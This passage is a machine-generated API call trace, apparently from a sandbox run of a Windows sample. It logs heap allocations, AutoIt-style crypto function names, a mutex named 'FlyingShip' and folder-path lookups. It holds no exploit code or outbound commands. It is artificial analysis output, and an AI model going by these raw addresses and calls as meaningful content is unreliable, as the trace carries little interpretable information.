lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddc28 | out: hHeap=0x8a0000) returned 1 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1680 | out: hHeap=0x8a0000) returned 1 [0155.054] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.054] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf150 | out: hHeap=0x8a0000) returned 1 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1680 | out: hHeap=0x8a0000) returned 1 [0155.054] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.054] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf150 | out: hHeap=0x8a0000) returned 1 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1680 | out: hHeap=0x8a0000) returned 1 [0155.054] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.054] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf150 | out: hHeap=0x8a0000) returned 1 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1680 | out: hHeap=0x8a0000) returned 1 [0155.054] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.054] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0155.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf150 | out: hHeap=0x8a0000) returned 1 [0155.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1680 | out: hHeap=0x8a0000) returned 1 [0155.055] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.055] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0155.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dafd0 | out: hHeap=0x8a0000) returned 1 [0155.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1680 | out: hHeap=0x8a0000) returned 1 [0155.055] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.055] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0155.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddc28 | out: hHeap=0x8a0000) returned 1 [0155.055] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0155.055] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0155.055] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0155.055] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.055] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0155.055] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0155.055] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0155.055] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.055] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0155.055] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.055] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0155.055] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.055] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.056] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.056] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.056] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.056] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.056] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0155.056] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0155.056] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="FlyingShip") returned 0x114 [0155.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1780 [0155.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x902788 [0155.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9be0 [0155.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9bf8 [0155.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c10 [0155.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c28 [0155.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1730 [0155.058] FreeLibrary (hLibModule=0x75990000) returned 1 [0155.058] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1710 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x9029a8 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1720 [0155.058] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddd90 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b98 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1710 [0155.058] CharLowerBuffW (in: lpsz="dword", cchLength=0x5 | out: lpsz="dword") returned 0x5 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1750 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1740 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9af0 [0155.058] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9af0 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1740 [0155.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetLastError", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0155.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd) returned 0x9b9ad8 [0155.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetLastError", cchWideChar=13, lpMultiByteStr=0x9b9ad8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetLastError", lpUsedDefaultChar=0x0) returned 13 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.059] GetProcAddress (hModule=0x75990000, lpProcName="GetLastError") returned 0x759a11c0 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9af0 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1740 | out: hHeap=0x8a0000) returned 1 [0155.059] GetLastError () returned 0x0 [0155.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1740 [0155.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x9029a8 [0155.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1750 [0155.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9af0 [0155.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.059] FreeLibrary (hLibModule=0x75990000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b08 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1760 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9bb0 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b80 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b38 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b20 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dde08 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1720 | out: hHeap=0x8a0000) returned 1 [0155.059] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1720 [0155.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x902bc8 [0155.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1760 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x902bc8 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1760 | out: hHeap=0x8a0000) returned 1 [0155.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1720 | out: hHeap=0x8a0000) returned 1 [0155.060] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1720 [0155.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1760 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1760 | out: hHeap=0x8a0000) returned 1 [0155.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1760 [0155.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d240 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d240 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1760 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1720 | out: hHeap=0x8a0000) returned 1 [0155.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d528 [0155.060] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d528 | out: hHeap=0x8a0000) returned 1 [0155.060] PeekMessageW (in: lpMsg=0x87f8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f8ac) returned 0 [0155.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1720 [0155.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1760 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1760 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1720 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dafd0 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b99e8 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db018 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16e0 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddd18 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b99b8 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b99a0 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16c0 | out: hHeap=0x8a0000) returned 1 [0155.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddcc8 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a00 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf188 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16f0 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddd40 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9988 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9970 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddca0 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16b0 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddc78 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b99d0 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf150 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16d0 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddcf0 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9af0 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1750 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9029a8 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1740 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b98 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddde0 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1710 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddd90 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9bf8 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c10 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c28 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dddb8 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1730 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c58 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c40 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9be0 | out: hHeap=0x8a0000) returned 1 [0155.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x902788 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1780 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a18 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a30 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1700 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddd68 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9958 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1690 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16a0 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddc28 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9928 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9910 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9940 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddc50 | out: hHeap=0x8a0000) returned 1 [0155.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e16a0 [0155.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d240 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d240 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16a0 | out: hHeap=0x8a0000) returned 1 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1680 | out: hHeap=0x8a0000) returned 1 [0155.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d528 [0155.062] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d528 | out: hHeap=0x8a0000) returned 1 [0155.062] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddc50 [0155.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9940 [0155.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1680 [0155.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9940 | out: hHeap=0x8a0000) returned 1 [0155.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddc28 [0155.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9940 [0155.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9910 [0155.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e16a0 [0155.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9910 | out: hHeap=0x8a0000) returned 1 [0155.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddd68 [0155.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9910 [0155.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1690 [0155.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e2778 [0155.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1700 [0155.063] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x87f2e0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0155.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9928 [0155.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1690 | out: hHeap=0x8a0000) returned 1 [0155.064] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files", lpszShortPath=0x86f944, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1") returned 0x14 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1690 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf188 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9958 [0155.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2778 | out: hHeap=0x8a0000) returned 1 [0155.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1700 | out: hHeap=0x8a0000) returned 1 [0155.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9928 | out: hHeap=0x8a0000) returned 1 [0155.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9910 